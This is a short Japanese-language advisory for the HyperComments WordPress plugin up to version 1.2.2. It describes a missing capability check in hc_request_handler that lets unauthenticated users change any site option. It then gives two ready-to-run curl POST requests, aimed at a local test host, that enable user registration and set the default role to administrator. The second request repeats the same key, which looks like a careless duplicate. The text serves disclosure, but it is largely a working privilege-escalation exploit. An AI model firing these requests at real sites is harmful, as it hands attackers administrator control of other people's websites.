
HyperComments <= 1.2.2 - 未認証(Subscriber+)任意オプション更新
HyperComments <= 1.2.2 - 未認証(サブスクライバー以上)任意オプション更新
WordPress用HyperCommentsプラグインは、バージョン1.2.2以前のすべてのバージョンにおいて、hc_request_handler関数におけるケイパビリティチェックの欠落により、権限昇格につながる可能性のあるデータの不正な変更に対して脆弱です。これにより、未認証の攻撃者がWordPressサイト上の任意のオプションを更新することが可能になります。これは、登録時のデフォルトロールを管理者(administrator)に変更し、ユーザー登録を有効にするために悪用される可能性があり、攻撃者は脆弱なサイトへの管理者アクセスを取得できます。
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"default_role\":\"administrator\"}" \
-H "Content-Type: application/x-www-form-urlencoded"
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"users_can_register\":\"1\"}" \
-H "Content-Type: application/x-www-form-urlencoded"